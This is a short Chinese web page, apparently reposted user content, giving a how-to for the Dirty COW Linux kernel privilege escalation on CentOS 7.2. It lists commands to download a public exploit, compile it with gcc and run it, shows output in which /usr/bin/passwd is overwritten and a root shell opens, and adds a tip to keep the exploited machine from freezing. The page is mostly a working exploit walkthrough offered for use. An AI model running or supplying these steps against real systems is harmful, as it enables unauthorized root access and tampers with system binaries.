首页 > 代码库 > 关于脏牛
关于脏牛
测试平台:CentOS7.2
编译工具GCC
-
POC地址:https://www.exploit-db.com/exploits/40611/
-
EXP地址:https://www.exploit-db.com/exploits/40616/
mkdir cowroot
cd cowroot
wget https://www.exploit-db.com/download/40616
mv 40616 cowroot.c
gcc cowroot.c -o cowroot -pthread
这时会发现GCC编译器有警告,不要管,当前目录下已经编译完成cowwroot文件了
执行cowroot
./cowroot
-
执行
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 57048
Racing, this may take a while..
/usr/bin/passwd is overwritten
Popping root shell.
Don‘t forget to restore /tmp/bak
thread stopped
thread stopped会发现用户已经变为root
但这里有一个问题,在执行EXP之后十几秒后,系统会卡死,在kali2.0(debian) CentOS7.2
ubuntu14.04测试都卡死
这样就算到时候利用这个漏洞提权成功,卡死后也没用了,只能重新登陆
方法是关闭pdfflush刷新,防止死机
关于脏牛
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。